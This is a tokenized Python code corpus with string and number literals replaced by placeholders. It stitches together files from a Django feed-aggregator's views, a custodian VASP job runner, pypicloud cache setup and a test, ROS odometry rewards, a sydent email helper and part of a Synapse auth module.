Feed . site_objects . 
all ( ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : feeds_list } , context_instance = RequestContext ( request ) ) <EOL> def feed_detail ( request , feed_id , tag = None , slug = None ) : <EOL> feed = get_object_or_404 ( Feed , pk = feed_id ) <EOL> if not slug : <EOL> return redirect ( feed , permanent = True ) <EOL> if tag : <EOL> tag = get_object_or_404 ( Tag , name = tag ) <EOL> posts = TaggedItem . objects . get_by_model ( <EOL> Post . site_objects , tag ) . filter ( feed = feed ) . order_by ( "<STR_LIT>" ) <EOL> else : <EOL> posts = Post . site_objects . filter ( feed = feed ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : feed , "<STR_LIT>" : posts , "<STR_LIT>" : tag } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def authors_list ( request ) : <EOL> authors = Author . site_objects . all ( ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : authors } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def author_detail ( request , author_id , tag = None , slug = None ) : <EOL> author = get_object_or_404 ( Author , pk = author_id ) <EOL> if not slug : <EOL> return redirect ( author , permanent = True ) <EOL> if tag : <EOL> tag = get_object_or_404 ( Tag , name = tag ) <EOL> posts = TaggedItem . objects . get_by_model ( Post . site_objects , tag ) . filter ( <EOL> authors = author ) . order_by ( "<STR_LIT>" ) <EOL> else : <EOL> posts = Post . site_objects . filter ( <EOL> authors = author ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : author , "<STR_LIT>" : posts , "<STR_LIT>" : tag } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def posts_list ( request ) : <EOL> posts = Post . site_objects . all ( ) . select_related ( "<STR_LIT>" , "<STR_LIT>" ) . prefetch_related ( "<STR_LIT>" ) . 
order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : posts } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def post_detail ( request , post_id , slug = None ) : <EOL> post = get_object_or_404 ( <EOL> Post . objects . select_related ( "<STR_LIT>" , "<STR_LIT>" ) . prefetch_related ( "<STR_LIT>" ) , <EOL> pk = post_id <EOL> ) <EOL> if not slug : <EOL> return redirect ( post , permanent = True ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : post } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def tag_detail ( request , tag ) : <EOL> tag = get_object_or_404 ( Tag , name = tag ) <EOL> posts = TaggedItem . objects . get_by_model ( <EOL> Post . site_objects , tag ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : posts , <EOL> "<STR_LIT>" : tag } , context_instance = RequestContext ( request ) ) <EOL> def tag_authors_list ( request , tag ) : <EOL> tag = get_object_or_404 ( Tag , name = tag ) <EOL> posts_list = TaggedItem . objects . get_by_model ( Post . site_objects , tag ) <EOL> authors = set ( ) <EOL> for post in posts_list : <EOL> for author in post . authors . all ( ) : <EOL> authors . add ( author ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : list ( authors ) , "<STR_LIT>" : tag } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def tag_feeds_list ( request , tag ) : <EOL> tag = get_object_or_404 ( Tag , name = tag ) <EOL> post_ids = TaggedItem . objects . get_by_model ( Post . site_objects , tag <EOL> ) . values_list ( "<STR_LIT:id>" , flat = True ) <EOL> feeds_list = Feed . site_objects . filter ( post__in = post_ids ) . distinct ( ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : feeds_list , "<STR_LIT>" : tag } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def tags_cloud ( request , min_posts_count = <NUM_LIT:1> ) : <EOL> tags_cloud = Tag . objects . 
cloud_for_model ( Post ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : tags_cloud } , context_instance = RequestContext ( request ) ) <EOL> def foaf ( request ) : <EOL> feeds = Feed . site_objects . all ( ) . select_related ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : feeds } , <EOL> context_instance = RequestContext ( request ) , content_type = "<STR_LIT>" ) <EOL> def opml ( request ) : <EOL> feeds = Feed . site_objects . all ( ) . select_related ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : feeds } , <EOL> context_instance = RequestContext ( request ) , content_type = "<STR_LIT>" ) <EOL> def search ( request ) : <EOL> if request . method == "<STR_LIT:GET>" and request . GET . get ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> search_form = SearchForm ( request . GET ) <EOL> if search_form . is_valid ( ) : <EOL> query = search_form . cleaned_data [ "<STR_LIT:q>" ] <EOL> if search_form . cleaned_data [ "<STR_LIT:w>" ] == "<STR_LIT>" : <EOL> params_dict = { "<STR_LIT>" : query } <EOL> posts = Post . site_objects . filter ( ** params_dict <EOL> ) . distinct ( ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : posts } , context_instance = RequestContext ( request ) ) <EOL> elif search_form . cleaned_data [ "<STR_LIT:w>" ] == "<STR_LIT>" : <EOL> params_dict = { "<STR_LIT>" : query } <EOL> tags_list = Tag . objects . filter ( ** params_dict <EOL> ) . distinct ( ) . order_by ( "<STR_LIT:name>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : tags_list } , <EOL> context_instance = RequestContext ( request ) ) <EOL> elif search_form . cleaned_data [ "<STR_LIT:w>" ] == "<STR_LIT>" : <EOL> params_dict = { "<STR_LIT>" : query } <EOL> blogs_list = Blog . site_objects . filter ( ** params_dict <EOL> ) . 
order_by ( "<STR_LIT:title>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : blogs_list } , <EOL> context_instance = RequestContext ( request ) ) <EOL> elif search_form . cleaned_data [ "<STR_LIT:w>" ] == "<STR_LIT>" : <EOL> params_dict = { "<STR_LIT>" : query } <EOL> feeds_list = Feed . site_objects . filter ( ** params_dict <EOL> ) . order_by ( "<STR_LIT:title>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : feeds_list } , <EOL> context_instance = RequestContext ( request ) ) <EOL> elif search_form . cleaned_data [ "<STR_LIT:w>" ] == "<STR_LIT>" : <EOL> params_dict = { "<STR_LIT>" : query } <EOL> authors_list = Author . site_objects . filter ( ** params_dict <EOL> ) . order_by ( "<STR_LIT:name>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : authors_list } , <EOL> context_instance = RequestContext ( request ) ) <EOL> else : <EOL> return HttpResponseRedirect ( reverse ( "<STR_LIT>" ) ) <EOL> else : <EOL> return HttpResponseRedirect ( reverse ( "<STR_LIT>" ) ) <EOL> else : <EOL> return HttpResponseRedirect ( reverse ( "<STR_LIT>" ) ) <EOL> class FeedAddView ( CreateView ) : <EOL> model = Feed <EOL> fields = [ "<STR_LIT:url>" ] <EOL> template_name = '<STR_LIT>' <EOL> success_message = _ ( "<STR_LIT>" ) <EOL> def clean_url ( self ) : <EOL> url = self . cleaned_data [ '<STR_LIT:url>' ] <EOL> if Feed . objects . filter ( url = url ) . count ( ) > <NUM_LIT:0> : <EOL> raise ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return url <EOL> def form_valid ( self , form ) : <EOL> feed = form . save ( ) <EOL> if self . request . user . is_authenticated ( ) : <EOL> feed . blog . owner = self . request . user <EOL> feed . blog . save ( ) <EOL> self . object = feed <EOL> return HttpResponseRedirect ( reverse ( "<STR_LIT>" ) ) <EOL> class BlogListByUserView ( ListView ) : <EOL> template_name = '<STR_LIT>' <EOL> model = Blog <EOL> def get_queryset ( self ) : <EOL> return Blog . objects . filter ( owner = self . 
request . user ) <EOL> class OwnedObjectMixin ( SingleObjectMixin ) : <EOL> """<STR_LIT>""" <EOL> def get_object ( self , * args , ** kwargs ) : <EOL> obj = super ( OwnedObjectMixin , self ) . get_object ( * args , ** kwargs ) <EOL> try : <EOL> if not obj . owner == self . request . user : <EOL> raise Http404 ( ) <EOL> except AttributeError : <EOL> pass <EOL> return obj <EOL> class BlogDeleteView ( DeleteView , OwnedObjectMixin ) : <EOL> template_name = '<STR_LIT>' <EOL> model = Blog <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals , division <EOL> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> __maintainer__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __status__ = "<STR_LIT>" <EOL> __date__ = "<STR_LIT>" <EOL> import subprocess <EOL> import os <EOL> import shutil <EOL> import math <EOL> import logging <EOL> from pymatgen . io . vasp import VaspInput , Incar , Poscar , Outcar , Kpoints <EOL> from pymatgen . io . smart import read_structure <EOL> from pymatgen . io . vasp . sets import MITVaspInputSet <EOL> from monty . json import MontyDecoder <EOL> from monty . os . path import which <EOL> from custodian . custodian import Job <EOL> from custodian . vasp . interpreter import VaspModder <EOL> VASP_INPUT_FILES = { "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" } <EOL> VASP_OUTPUT_FILES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class VaspJob ( Job ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , vasp_cmd , output_file = "<STR_LIT>" , suffix = "<STR_LIT>" , <EOL> final = True , backup = True , <EOL> default_vasp_input_set = MITVaspInputSet ( ) , auto_npar = True , <EOL> auto_gamma = True , settings_override = None , <EOL> gamma_vasp_cmd = None , copy_magmom = False ) : <EOL> """<STR_LIT>""" <EOL> self . vasp_cmd = vasp_cmd <EOL> self . output_file = output_file <EOL> self . final = final <EOL> self . backup = backup <EOL> self . default_vis = default_vasp_input_set <EOL> self . suffix = suffix <EOL> self . settings_override = settings_override <EOL> self . auto_npar = auto_npar <EOL> self . auto_gamma = auto_gamma <EOL> self . gamma_vasp_cmd = gamma_vasp_cmd <EOL> self . copy_magmom = copy_magmom <EOL> def setup ( self ) : <EOL> """<STR_LIT>""" <EOL> files = os . 
listdir ( "<STR_LIT:.>" ) <EOL> num_structures = <NUM_LIT:0> <EOL> if not set ( files ) . issuperset ( VASP_INPUT_FILES ) : <EOL> for f in files : <EOL> try : <EOL> struct = read_structure ( f ) <EOL> num_structures += <NUM_LIT:1> <EOL> except : <EOL> pass <EOL> if num_structures != <NUM_LIT:1> : <EOL> raise RuntimeError ( "<STR_LIT>" <EOL> . format ( num_structures ) ) <EOL> else : <EOL> self . default_vis . write_input ( struct , "<STR_LIT:.>" ) <EOL> if self . backup : <EOL> for f in VASP_INPUT_FILES : <EOL> shutil . copy ( f , "<STR_LIT>" . format ( f ) ) <EOL> if self . auto_npar : <EOL> try : <EOL> incar = Incar . from_file ( "<STR_LIT>" ) <EOL> if not ( incar . get ( "<STR_LIT>" ) or incar . get ( "<STR_LIT>" ) or <EOL> incar . get ( "<STR_LIT>" ) ) : <EOL> if incar . get ( "<STR_LIT>" ) in [ <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ] : <EOL> del incar [ "<STR_LIT>" ] <EOL> else : <EOL> import multiprocessing <EOL> ncores = os . environ . get ( '<STR_LIT>' ) or multiprocessing . cpu_count ( ) <EOL> ncores = int ( ncores ) <EOL> for npar in range ( int ( math . sqrt ( ncores ) ) , <EOL> ncores ) : <EOL> if ncores % npar == <NUM_LIT:0> : <EOL> incar [ "<STR_LIT>" ] = npar <EOL> break <EOL> incar . write_file ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> if self . settings_override is not None : <EOL> VaspModder ( ) . apply_actions ( self . settings_override ) <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = list ( self . vasp_cmd ) <EOL> if self . auto_gamma : <EOL> vi = VaspInput . from_directory ( "<STR_LIT:.>" ) <EOL> kpts = vi [ "<STR_LIT>" ] <EOL> if kpts . style == Kpoints . supported_modes . Gamma and tuple ( kpts . kpts [ <NUM_LIT:0> ] ) == ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) : <EOL> if self . gamma_vasp_cmd is not None and which ( <EOL> self . gamma_vasp_cmd [ - <NUM_LIT:1> ] ) : <EOL> cmd = self . 
gamma_vasp_cmd <EOL> elif which ( cmd [ - <NUM_LIT:1> ] + "<STR_LIT>" ) : <EOL> cmd [ - <NUM_LIT:1> ] += "<STR_LIT>" <EOL> logging . info ( "<STR_LIT>" . format ( "<STR_LIT:U+0020>" . join ( cmd ) ) ) <EOL> with open ( self . output_file , '<STR_LIT:w>' ) as f : <EOL> p = subprocess . Popen ( cmd , stdout = f ) <EOL> return p <EOL> def postprocess ( self ) : <EOL> """<STR_LIT>""" <EOL> for f in VASP_OUTPUT_FILES + [ self . output_file ] : <EOL> if os . path . exists ( f ) : <EOL> if self . final and self . suffix != "<STR_LIT>" : <EOL> shutil . move ( f , "<STR_LIT>" . format ( f , self . suffix ) ) <EOL> elif self . suffix != "<STR_LIT>" : <EOL> shutil . copy ( f , "<STR_LIT>" . format ( f , self . suffix ) ) <EOL> if self . copy_magmom and not self . final : <EOL> try : <EOL> outcar = Outcar ( "<STR_LIT>" ) <EOL> magmom = [ m [ '<STR_LIT>' ] for m in outcar . magnetization ] <EOL> incar = Incar . from_file ( "<STR_LIT>" ) <EOL> incar [ '<STR_LIT>' ] = magmom <EOL> incar . write_file ( "<STR_LIT>" ) <EOL> except : <EOL> logging . 
error ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def double_relaxation_run ( cls , vasp_cmd , auto_npar = True ) : <EOL> """<STR_LIT>""" <EOL> return [ VaspJob ( vasp_cmd , final = False , suffix = "<STR_LIT>" , <EOL> auto_npar = auto_npar ) , <EOL> VaspJob ( <EOL> vasp_cmd , final = True , backup = False , <EOL> suffix = "<STR_LIT>" , auto_npar = auto_npar , <EOL> settings_override = [ <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:action>" : { "<STR_LIT>" : { "<STR_LIT>" : <NUM_LIT:1> } } } , <EOL> { "<STR_LIT:file>" : "<STR_LIT>" , <EOL> "<STR_LIT:action>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } } ] ) ] <EOL> @ classmethod <EOL> def full_opt_run ( cls , vasp_cmd , auto_npar = True , vol_change_tol = <NUM_LIT> , <EOL> max_steps = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> for i in xrange ( max_steps ) : <EOL> if i == <NUM_LIT:0> : <EOL> settings = None <EOL> backup = True <EOL> else : <EOL> backup = False <EOL> initial = Poscar . from_file ( "<STR_LIT>" ) . structure <EOL> final = Poscar . from_file ( "<STR_LIT>" ) . structure <EOL> vol_change = ( final . volume - initial . volume ) / initial . volume <EOL> logging . info ( "<STR_LIT>" % ( vol_change * <NUM_LIT:100> ) ) <EOL> if abs ( vol_change ) < vol_change_tol : <EOL> logging . info ( "<STR_LIT>" ) <EOL> break <EOL> else : <EOL> settings = [ <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:action>" : { "<STR_LIT>" : { "<STR_LIT>" : <NUM_LIT:1> } } } , <EOL> { "<STR_LIT:file>" : "<STR_LIT>" , <EOL> "<STR_LIT:action>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } } ] <EOL> logging . info ( "<STR_LIT>" % ( i + <NUM_LIT:1> ) ) <EOL> yield VaspJob ( vasp_cmd , final = False , backup = backup , <EOL> suffix = "<STR_LIT>" % ( i + <NUM_LIT:1> ) , auto_npar = auto_npar , <EOL> settings_override = settings ) <EOL> def as_dict ( self ) : <EOL> d = dict ( vasp_cmd = self . vasp_cmd , <EOL> output_file = self . output_file , suffix = self . suffix , <EOL> final = self . final , backup = self . 
backup , <EOL> default_vasp_input_set = self . default_vis . as_dict ( ) , <EOL> auto_npar = self . auto_npar , auto_gamma = self . auto_gamma , <EOL> settings_override = self . settings_override , <EOL> gamma_vasp_cmd = self . gamma_vasp_cmd <EOL> ) <EOL> d [ "<STR_LIT>" ] = self . __class__ . __module__ <EOL> d [ "<STR_LIT>" ] = self . __class__ . __name__ <EOL> return d <EOL> @ classmethod <EOL> def from_dict ( cls , d ) : <EOL> vis = MontyDecoder ( ) . process_decoded ( d [ "<STR_LIT>" ] ) <EOL> return VaspJob ( <EOL> vasp_cmd = d [ "<STR_LIT>" ] , output_file = d [ "<STR_LIT>" ] , <EOL> suffix = d [ "<STR_LIT>" ] , final = d [ "<STR_LIT>" ] , <EOL> backup = d [ "<STR_LIT>" ] , default_vasp_input_set = vis , <EOL> auto_npar = d [ '<STR_LIT>' ] , auto_gamma = d [ '<STR_LIT>' ] , <EOL> settings_override = d [ "<STR_LIT>" ] , <EOL> gamma_vasp_cmd = d [ "<STR_LIT>" ] ) </s>
<s> """<STR_LIT>""" <EOL> from functools import partial <EOL> from pyramid . path import DottedNameResolver <EOL> from . base import ICache <EOL> from . redis_cache import RedisCache <EOL> from . sql import SQLCache <EOL> def includeme ( config ) : <EOL> """<STR_LIT>""" <EOL> settings = config . get_settings ( ) <EOL> resolver = DottedNameResolver ( __name__ ) <EOL> dotted_cache = settings . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if dotted_cache == '<STR_LIT>' : <EOL> dotted_cache = '<STR_LIT>' <EOL> elif dotted_cache == '<STR_LIT>' : <EOL> dotted_cache = '<STR_LIT>' <EOL> elif dotted_cache == '<STR_LIT>' : <EOL> dotted_cache = '<STR_LIT>' <EOL> cache_impl = resolver . resolve ( dotted_cache ) <EOL> kwargs = cache_impl . configure ( settings ) <EOL> cache = cache_impl ( ** kwargs ) <EOL> cache . reload_if_needed ( ) <EOL> config . add_request_method ( partial ( cache_impl , ** kwargs ) , name = '<STR_LIT>' , <EOL> reify = True ) <EOL> return cache_impl </s>
<s> """<STR_LIT>""" <EOL> from mock import MagicMock <EOL> from . import MockServerTest <EOL> from pypicloud . views . packages import list_packages <EOL> class TestPackages ( MockServerTest ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( TestPackages , self ) . setUp ( ) <EOL> self . request . access = MagicMock ( ) <EOL> def test_list_packages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . request . db = MagicMock ( ) <EOL> self . request . db . distinct . return_value = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> self . request . access . has_permission . side_effect = lambda x , _ : x == '<STR_LIT:b>' or x == '<STR_LIT:c>' <EOL> def get_packages ( x ) : <EOL> """<STR_LIT>""" <EOL> def mm ( package_name ) : <EOL> """<STR_LIT>""" <EOL> p = MagicMock ( ) <EOL> p . filename = package_name <EOL> p . get_url . return_value = package_name + "<STR_LIT>" <EOL> return p <EOL> d = { <EOL> '<STR_LIT:a>' : [ mm ( '<STR_LIT>' ) , mm ( '<STR_LIT>' ) ] , <EOL> '<STR_LIT:b>' : [ mm ( '<STR_LIT>' ) ] , <EOL> '<STR_LIT:c>' : [ mm ( '<STR_LIT>' ) , mm ( '<STR_LIT>' ) , mm ( '<STR_LIT>' ) ] <EOL> } <EOL> return d . get ( x , [ ] ) <EOL> self . request . db . all . side_effect = get_packages <EOL> result = list_packages ( self . request ) <EOL> expected = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> self . assertEqual ( result , { '<STR_LIT>' : expected } ) </s>
<s> import rospy <EOL> from nav_msgs . msg import Odometry <EOL> import sys <EOL> import time <EOL> def close ( p1 , p2 ) : <EOL> diff = abs ( p1 . x - p2 . x ) + abs ( p1 . y - p2 . y ) + abs ( p1 . z - p2 . z ) <EOL> return diff < <NUM_LIT> <EOL> def grid_pt_for_pos ( pos ) : <EOL> gx , gy = int ( pos . x / <NUM_LIT:2> ) , int ( pos . y / <NUM_LIT:2> ) <EOL> return gx + <NUM_LIT:5> * gy <EOL> class MovingOdomReward ( object ) : <EOL> def __init__ ( self , robot_id ) : <EOL> self . robot_id = robot_id <EOL> self . reset ( ) <EOL> rospy . Subscriber ( "<STR_LIT>" % self . robot_id , Odometry , self . odom_callback ) <EOL> def reset ( self ) : <EOL> self . last_pos = None <EOL> self . latest_pos = None <EOL> def odom_callback ( self , msg ) : <EOL> self . latest_pos = msg . pose . pose . position <EOL> def reward ( self , last_action ) : <EOL> if self . latest_pos == None : <EOL> return <NUM_LIT:0> <EOL> if self . last_pos == None : <EOL> self . last_pos = self . latest_pos <EOL> return <NUM_LIT:0> <EOL> r = <NUM_LIT:0> <EOL> if last_action == <NUM_LIT:0> : <EOL> moved = not close ( self . latest_pos , self . last_pos ) <EOL> r = <NUM_LIT:1> if moved else - <NUM_LIT:1> <EOL> self . last_pos = self . latest_pos <EOL> return r <EOL> class CoarseGridOdomReward ( object ) : <EOL> REWARD_MOVE_FORWARD_A_BIT = <NUM_LIT:1> <EOL> REWARD_MOVE_FORWARD_ONE_GRID = <NUM_LIT:0> <EOL> REWARD_MOVE_BACKWARD_ONE_GRID = <NUM_LIT:0> <EOL> GRID_ORDER = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:9> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:12> , <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:15> , <NUM_LIT:20> , <NUM_LIT> ] <EOL> LEN = len ( GRID_ORDER ) <EOL> def __init__ ( self , robot_id ) : <EOL> self . robot_id = robot_id <EOL> self . reset ( ) <EOL> rospy . Subscriber ( "<STR_LIT>" % self . robot_id , Odometry , self . odom_callback ) <EOL> def reset ( self ) : <EOL> self . last_pos = None <EOL> self . 
latest_pos = None <EOL> def odom_callback ( self , msg ) : <EOL> self . latest_pos = msg . pose . pose . position <EOL> def reward ( self ) : <EOL> if self . latest_pos == None : <EOL> return <NUM_LIT:0> <EOL> if self . last_pos == None : <EOL> self . last_pos = self . latest_pos <EOL> return <NUM_LIT:0> <EOL> latest_grid_idx = OdomReward . GRID_ORDER . index ( grid_pt_for_pos ( self . latest_pos ) ) <EOL> last_grid_idx = OdomReward . GRID_ORDER . index ( grid_pt_for_pos ( self . last_pos ) ) <EOL> r = None <EOL> wrap = len ( OdomReward . GRID_ORDER ) <EOL> if latest_grid_idx == last_grid_idx : <EOL> if close ( self . latest_pos , self . last_pos ) : <EOL> r = <NUM_LIT:0> <EOL> else : <EOL> r = REWARD_MOVE_FORWARD_A_BIT <EOL> elif latest_grid_idx == ( last_grid_idx + <NUM_LIT:1> ) % wrap : <EOL> r = REWARD_MOVE_FORWARD_ONE_GRID <EOL> elif latest_grid_idx == ( last_grid_idx - <NUM_LIT:1> ) % wrap : <EOL> r = REWARD_MOVE_BACKWARD_ONE_GRID <EOL> else : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> self . last_pos = None <EOL> return <NUM_LIT:0> <EOL> self . last_pos = self . latest_pos <EOL> return r </s>
<s> from getpass import getpass <EOL> try : <EOL> get_input = raw_input <EOL> except NameError : <EOL> get_input = input <EOL> def get_user_details ( argv ) : <EOL> if len ( argv ) > <NUM_LIT:1> : <EOL> host = argv [ <NUM_LIT:1> ] <EOL> else : <EOL> host = get_input ( "<STR_LIT>" ) <EOL> if len ( argv ) > <NUM_LIT:2> : <EOL> username = argv [ <NUM_LIT:2> ] <EOL> else : <EOL> username = get_input ( "<STR_LIT>" ) <EOL> if len ( argv ) > <NUM_LIT:3> : <EOL> password = argv [ <NUM_LIT:3> ] <EOL> else : <EOL> password = getpass ( ) <EOL> return host , username , password </s>
<s> import logging <EOL> import os <EOL> import random <EOL> import smtplib <EOL> import email . utils <EOL> import string <EOL> import twisted . python . log <EOL> import cgi <EOL> import urllib <EOL> import email . utils <EOL> from sydent . util import time_msec <EOL> logger = logging . getLogger ( __name__ ) <EOL> def sendEmail ( sydent , templateName , mailTo , substitutions ) : <EOL> mailFrom = sydent . cfg . get ( '<STR_LIT:email>' , '<STR_LIT>' ) <EOL> mailTemplateFile = sydent . cfg . get ( '<STR_LIT:email>' , templateName ) <EOL> myHostname = os . uname ( ) [ <NUM_LIT:1> ] <EOL> midRandom = "<STR_LIT>" . join ( [ random . choice ( string . ascii_letters ) for _ in range ( <NUM_LIT:16> ) ] ) <EOL> messageid = "<STR_LIT>" % ( time_msec ( ) , midRandom , myHostname ) <EOL> allSubstitutions = { } <EOL> allSubstitutions . update ( substitutions ) <EOL> allSubstitutions . update ( { <EOL> '<STR_LIT>' : messageid , <EOL> '<STR_LIT:date>' : email . utils . formatdate ( localtime = False ) , <EOL> '<STR_LIT:to>' : mailTo , <EOL> '<STR_LIT>' : mailFrom , <EOL> } ) <EOL> for k , v in allSubstitutions . items ( ) : <EOL> allSubstitutions [ k ] = v . decode ( '<STR_LIT:utf8>' ) <EOL> allSubstitutions [ k + "<STR_LIT>" ] = cgi . escape ( v . decode ( '<STR_LIT:utf8>' ) ) <EOL> allSubstitutions [ k + "<STR_LIT>" ] = urllib . quote ( v ) <EOL> mailString = open ( mailTemplateFile ) . read ( ) % allSubstitutions <EOL> rawFrom = email . utils . parseaddr ( mailFrom ) [ <NUM_LIT:1> ] <EOL> rawTo = email . utils . parseaddr ( mailTo ) [ <NUM_LIT:1> ] <EOL> if rawFrom == '<STR_LIT>' or rawTo == '<STR_LIT>' : <EOL> logger . info ( "<STR_LIT>" , mailFrom , mailTo ) <EOL> raise EmailAddressException ( ) <EOL> mailServer = sydent . cfg . get ( '<STR_LIT:email>' , '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" % ( mailTo , mailServer , ) ) <EOL> try : <EOL> smtp = smtplib . SMTP ( mailServer ) <EOL> smtp . sendmail ( rawFrom , rawTo , mailString . 
encode ( '<STR_LIT:utf-8>' ) ) <EOL> smtp . quit ( ) <EOL> except Exception as origException : <EOL> twisted . python . log . err ( ) <EOL> ese = EmailSendException ( ) <EOL> ese . cause = origException <EOL> raise ese <EOL> class EmailAddressException ( Exception ) : <EOL> pass <EOL> class EmailSendException ( Exception ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from canonicaljson import encode_canonical_json <EOL> from signedjson . key import decode_verify_key_bytes <EOL> from signedjson . sign import verify_signed_json , SignatureVerifyException <EOL> from twisted . internet import defer <EOL> from synapse . api . constants import EventTypes , Membership , JoinRules <EOL> from synapse . api . errors import AuthError , Codes , SynapseError , EventSizeError <EOL> from synapse . types import Requester , RoomID , UserID , EventID <EOL> from synapse . util . logutils import log_function <EOL> from synapse . util . logcontext import preserve_context_over_fn <EOL> from unpaddedbase64 import decode_base64 <EOL> import logging <EOL> import pymacaroons <EOL> logger = logging . getLogger ( __name__ ) <EOL> AuthEventTypes = ( <EOL> EventTypes . Create , EventTypes . Member , EventTypes . PowerLevels , <EOL> EventTypes . JoinRules , EventTypes . RoomHistoryVisibility , <EOL> EventTypes . ThirdPartyInvite , <EOL> ) <EOL> class Auth ( object ) : <EOL> def __init__ ( self , hs ) : <EOL> self . hs = hs <EOL> self . store = hs . get_datastore ( ) <EOL> self . state = hs . get_state_handler ( ) <EOL> self . TOKEN_NOT_FOUND_HTTP_STATUS = <NUM_LIT> <EOL> self . _KNOWN_CAVEAT_PREFIXES = set ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> def check ( self , event , auth_events ) : <EOL> """<STR_LIT>""" <EOL> self . check_size_limits ( event ) <EOL> try : <EOL> if not hasattr ( event , "<STR_LIT>" ) : <EOL> raise AuthError ( <NUM_LIT> , "<STR_LIT>" % event ) <EOL> if auth_events is None : <EOL> logger . warn ( "<STR_LIT>" , event . event_id ) <EOL> return True <EOL> if event . type == EventTypes . Create : <EOL> return True <EOL> creation_event = auth_events . get ( ( EventTypes . Create , "<STR_LIT>" ) , None ) <EOL> if not creation_event : <EOL> raise SynapseError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" % ( event . 
room_id , ) <EOL> ) <EOL> creating_domain = RoomID . from_string ( event . room_id ) . domain <EOL> originating_domain = UserID . from_string ( event . sender ) . domain <EOL> if creating_domain != originating_domain : <EOL> if not self . can_federate ( event , auth_events ) : <EOL> raise AuthError ( <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" <EOL> ) <EOL> if event . type == EventTypes . Aliases : <EOL> return True <EOL> logger . debug ( <EOL> "<STR_LIT>" , <EOL> [ a . event_id for a in auth_events . values ( ) ] <EOL> ) <EOL> if event . type == EventTypes . Member : <EOL> allowed = self . is_membership_change_allowed ( <EOL> event , auth_events <EOL> ) <EOL> if allowed : <EOL> logger . debug ( "<STR_LIT>" , event ) <EOL> else : <EOL> logger . debug ( "<STR_LIT>" , event ) <EOL> return allowed <EOL> self . check_event_sender_in_room ( event , auth_events ) <EOL> self . _can_send_event ( event , auth_events ) <EOL> if event . type == EventTypes . PowerLevels : <EOL> self . 